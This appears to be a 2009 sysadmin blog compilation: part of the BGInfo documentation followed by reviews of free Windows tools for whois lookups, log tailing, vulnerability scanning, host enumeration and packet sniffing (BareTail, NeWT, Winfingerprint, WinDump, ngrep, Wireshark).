Position: Selects the location on the screen at which to place the text. If some items are very long (for example some network card names) you can use the Limit Lines to item to wrap them. The Compensate for Taskbar position checkbox adjusts the position of the text to ensure that it is not covered by the Taskbar. The Multiple Monitor Configuration button allows you to specify how multiple monitors attached to a single console should be handled.
Desktops: Selects which desktops are updated when the configuration is applied. By default only the User Desktop wallpaper is changed. Enabling the Logon Desktop for Console users option specifies that the wallpaper should be displayed on the logon desktop that is presented before anyone has logged onto the system. On Windows 95/98/ME systems the same desktop is used for users and the login screen, so this option has no effect. Enabling the Logon Desktop for Terminal Services users option specifies that the wallpaper should be displayed on the Terminal Services login screen. This option is useful only on servers running Terminal Services.
Preview: Displays the background as it will appear when applied to your system.

Configuration Menu Items

These are options that control how the bitmap is produced, where it is located and how to import/export settings.
File | Open: Opens a BGInfo configuration file.
File | Save As: Saves a copy of the current BGInfo configuration to a new file. Once created, you can have BGInfo use the file later by simply specifying it on the command line, or by using File|Open menu option.
File|Reset Default Settings: Removes all configuration information and resets BGInfo to its default (install-time) state. Use this if you can't determine how to undo a change, or if BGInfo becomes confused about the current state of the bitmap.
File|Database: Specifies a .XLS, .MDB or .TXT file or a connection string to an SQL database that BGInfo should use to store the information it generates. Use this to collect a history of one or more systems on your network. You must ensure that all systems that access the file have the same version of MDAC and JET database support installed. It is recommended you use at least MDAC 2.5 and JET 4.0. If specifying an XLS file the file must already exist.
If you prefer to have BGInfo update the database without modifying the user's wallpaper you can unselect all desktops in the Desktops dialog; BGInfo will still update the database.
Bitmap|256 Colors: Limits the bitmap to 256 colors. This option produces a smaller bitmap.
Bitmap|High Color/True Color: Creates a 16-bit or 24-bit color bitmap.
Bitmap|Match Display: Creates a bitmap with color depth matching that of the display. Because the bitmap generated by BGInfo is not updated when a user changes the display's color depth you may see unexpected results (especially dithering of the text and background) with some combinations of bitmap and display depth.
Bitmap|Location: Specifies the location to place the output bitmap file. On Terminal Services servers the bitmap should be placed in a location that is unique to each user.
Edit|Insert Image: Allows you to insert a bitmap image into the output. Because BGInfo's configuration information is stored in the registry and Windows limits the size of registry values you may encounter errors when inserting larger images. On Windows 9x/Me systems the limit is 16K, while on NT/2000/XP systems the limit is 64K.

Command Line Options

        Specifies the name of a configuration file to use for the current session. Changes to the configuration are automatically saved back to the file when OK or Apply is pressed. If this parameter is not present BGInfo uses the default configuration information which is stored in the registry under the current user ("HKEY_CURRENT_USER\Software\Winternals\BGInfo").
/timer Specifies the timeout value for the countdown timer, in seconds. Specifying zero will update the display without displaying the configuration dialog. Specifying 300 seconds or longer disables the timer altogether.
/popup Causes BGInfo to create a popup window containing the configured information without updating the desktop. The information is formatted exactly as it would if displayed on the desktop, but resides in a fitted window instead. When using this option the history database is not updated.
/silent Suppresses error messages.
/taskbar Causes BGInfo to place an icon in the taskbar's status area without updating the desktop. Clicking the icon causes the configured information to appear in a popup window. When using this option the history database is not updated.
/all Specifies that BGInfo should change the wallpaper for any and all users currently logged in to the system. This option is useful within a Terminal Services environment, or when BGInfo is scheduled to run periodically on a system used by more than one person (see Using a Schedule below).
/log Causes BGInfo to write errors to the specified log file instead of generating a warning dialog box. This is useful for tracking down errors that occur when BGInfo is run under the scheduler.
/rtf Causes BGInfo to write its output text to an RTF file. All formatting information and colors are included.


Download BgInfo
(387 KB)

Run BgInfo now from Live.Sysinternals.com

Whois Command Line Utility for Windows

This great command line utility for Windows by Mark Russinovich over at SysInternals is the quick and easy way to get whois info for domain names or IP addresses.

Whois performs the registration record for the domain name or IP address that you specify.

Usage
whois domainname [whois.server]
whois IP address [whois.server]
Domainname can be either a DNS name (e.g. www.powercram.com) or IP address (e.g. 96.6.154.135).

For ease of use I prefer to save whois.exe to my Windows system directory (usually C:\Windows\System32) which is already in your path so you can invoke whois from any directory in the command prompt.

Download Whois

FREE Windows Utilities for Scanning, Auditing, and Monitoring

BareTail
Many applications keep detailed logging data in straight text files because the Windows event logs aren't appropriate for certain types of data (e.g., IIS log files). In the course of monitoring or troubleshooting these types of applications, it's often helpful to watch these log files in real time. However, because they're text files, that process typically consists of opening the file in Notepad or another text editor, looking at the contents, closing the file, then reopening the file to see what's changed.



In the UNIX world, a utility that serves this purpose has been available for quite some time: It's called tail. Fortunately, the good folks at Bare Metal Software have developed a free version of the tool called BareTail.


BareTail is a great utility for watching log files, such as IIS logs, cluster logs, and any other type of logs that can generate a lot of data quickly. BareTail can keep up with large log files (e.g., greater than 2GB) just as quickly as with smaller files, and—for easier visual recognition—it can selectively highlight specific entries that appear in a file based on matching text strings. For example, suppose you want to highlight references to cmd.exe in an IIS log file to easily spot which incoming connections are attempting to exploit known vulnerabilities.



One of BareTail's most compelling qualities is that it's a completely standalone executable. There's no installer package to work with, so you can use the utility on a client's system and feel safe that you've had little or no impact on the system after you complete your work.

NeWT
When I have security on the brain, I generally look to the open-source community for answers, rather than to specific vendors. After all, the open-source community can be voracious in its efforts to find and understand every aspect of a vulnerability or flaw. A shining example of this security consciousness is the open-source vulnerability scanner called Nessus.

Nessus is the world's most popular opensource vulnerability scanner. An estimated 75,000 organizations worldwide rely on Nessus to assess their networks and check for vulnerabilities. Originally launched in 1998 for UNIX, Nessus has been ported over to Windows by Tenable Network Security in a version called NeWT.

Tenable Network Security provides the standard version of NeWT free for anyone to use for any reason. The only limitation is that the host that NeWT runs on can scan only its local subnet. With more than 6000 known vulnerabilities that it can test for, NeWT is now the best vulnerability scanner available for the Windows platform.

When you unleash NeWT on your local subnet, it starts its process of testing each host it finds for vulnerabilities in its database. You can configure NeWT to test only for certain vulnerabilities—for example, if you're a 100 percent Microsoft shop, you don't need to test for UNIX vulnerabilities—and whether to attempt to fully exploit any vulnerabilities found to confirm its tests. NeWT can check for buffer-overflow vulnerabilities, watch for misconfigured application services (e.g., mail, Web), find all the listening ports on a server and determine the OS type, look for backdoors installed on an infected host, and more.

If you provide NeWT with appropriate administrative credentials, it will dive even deeper into your systems and check for local patching or the existence of malicious software. For example, on a test "victim" system in my lab, NeWT detected several spyware and adware packages that I intentionally installed on that host for some tests. NeWT recommended that I remove those applications. NeWT is the first tool I grab when I start a security assessment for a client, and it should be in every administrator's toolbox.

Winfingerprint
If you're looking for a quick and simple way to obtain information about a remote system, Winfingerprint is the tool of choice. Winfingerprint is a network scanner that runs on Windows. Unlike most network scanners, Winfingerprint is specifically designed to obtain information about Microsoft hosts and applications. Winfingerprint can use ICMP, RPC, SMB, SNMP, TCP, and UDP to obtain information (e.g., OS version, users, groups, SIDs, password policies, services, service packs and hotfixes, NetBIOS shares, transports, sessions, disks) about target systems. Winfingerprint comes in both a GUI version and a command-line version, so however you prefer to work, there's a version of Winfingerprint for you.

Winfingerprint determined the number of drives I had installed on my target system, as well as the MAC addresses of the interfaces and the OS and patch level. What you can't see in the figure, however, is that Winfingerprint went on to enumerate all the share names on that system, as well as the services that were installed and the names of the users. The tool obtained all that data in about 20 seconds, making Winfingerprint a terrific tool for quickly collecting inventory data about networked systems.

Wednesday, November 18, 2009

FREE Windows Utilities for Sniffing



WinDump
WinDump is an exceptionally powerful command-line packet sniffer. Ported over from the source of the Tcpdump utility available for UNIX, WinDump carries over the same power and flexibility to the Windows world, all in a lightweight executable.

WinDump is a helpful utility when you need to do some quick and easy packet capturing to diagnose a network problem. It's flexible, and it can capture and display details about every packet going across the network interface. It can filter the output results based on protocol (e.g., Address Resolution Protocol—ARP, IP, TCP, UDP), source network or host, destination network or host, source port, destination port, and many other criteria.

To use WinDump, you'll first need to download and install the Windows Packet Capture Library (WinPcap), the Windows port of the open-source packet-capture and network-analysis library libpcap for UNIX. WinPcap runs on all versions of Windows.

After you install WinPcap, you can download the standalone WinDump executable. To launch WinDump, simply run it from the command line with the appropriate options for what you'd like to capture or read. You'll find the online manual for WinDump here.

The first command you might want to execute is Win-Dump -D, which will display a list of interfaces available on your computer, as well as a corresponding number for each interface, so that you can determine which interface to use for your sniffing activities. After you know which interface to run, you can simply use that number with the -i option (i.e., WinDump -i 3, if number 3 is the interface you'd like to use) to start viewing packet data in real time. (Because these are ports of UNIX utilities, the command-line switches are case-sensitive.)

Ngrep
Although WinDump is a tremendous utility, sometimes it requires a considerable amount of overhead or knowledge to determine what you're looking for. For example, suppose you're trying to look up whether a DNS query is making it across your network, but you aren't familiar with the protocols and that DNS uses by default. Or, suppose a lot of traffic is coming across a network connection, and you're finding it too cumbersome to work through all the packets just to find the one particular packet you're looking for. For such situations enter ngrep, the network-aware grep utility.

If you aren't familiar with grep, it's probably one of the most widely known and oft-utilized UNIX utilities. Grep finds matching text strings (through a mechanism known as regular expressions) in files on a file system, then outputs the lines to the display. You might compare grep with the Windows command-line Find utility, but grep differs by providing an exceptional amount of power in its search for text strings.

By applying these capabilities to the network layer, ngrep provides the same level of functionality for packet sniffing. As a result, you don't need to know what protocols, ports, network, or IP addresses that two devices are using to transfer data. You just need to know something about the packet's payload, and ngrep will find it for you—regardless of how it's transmitted.

Ngrep is great for troubleshooting DNS query problems. In a large Active Directory (AD) environment, dozens of DNS queries are typically occurring across the network per second. If I'm trying to troubleshoot a specific set of problems, searching each packet to find the one I'm looking for is cumbersome at best. Instead of relying on a straight packet capture of all DNS traffic, I can simply use ngrep to find the text string I'm looking for because DNS queries and responses are performed in plain text.

Ngrep currently recognizes ICMP, IGMP, Raw, TCP, and UDP protocols across 802.11, Ethernet, FDDI, PPP, SLIP, Token Ring, and null interfaces. Like WinDump it requires the WinPcap library to operate properly.

WireShark (formerly Ethereal)
When you face a situation in which you need to roll up your sleeves and dive as deeply as possible into network capture and analysis, one utility needs to come to mind: the world's most popular network analyzer, WireShark. Network experts around the world use WireShark because it has all the standard features you'll find in most protocol analyzers, in addition to some you won't find in any other product. More than 400 developers around the world have made contributions to this open-source application. A decade ago, you would have to pay thousands of dollars for software that had the same capabilities, but WireShark offers it all free.

WireShark can capture data off your network connection, filter the data, dive into the details of each packet, save the packet capture for detailed analysis, send packet captures to other network engineers (or vendors) to help with debugging, and open packet captures from many other leading packet-capture utilities. WireShark can capture data off of various network transports, such as Classical IP over ATM (CIP), Ethernet, Fiber Distributed Data Interface (FDDI), Point-to-Point Protocol (PPP), Token Ring, 802.11, and loopback interfaces (although it doesn't support all types on every platform). Across all those network transports, WireShark can "dissect" more than 750 protocol types, including FTP, HTTP, NetBIOS, POP3, remote procedure call (RPC), SNMP, SSH, SMTP, and Telnet, just to name a few.

Like the other sniffing utilities I've mentioned, WireShark depends on an installation of WinPcap to function properly, so you'll need to install that first. Then, after you install the latest Ethereal distribution for Windows, simply access the Capture, Interfaces menu and select the interface you want to start using for capture. Then, you're ready to start analyzing your traffic.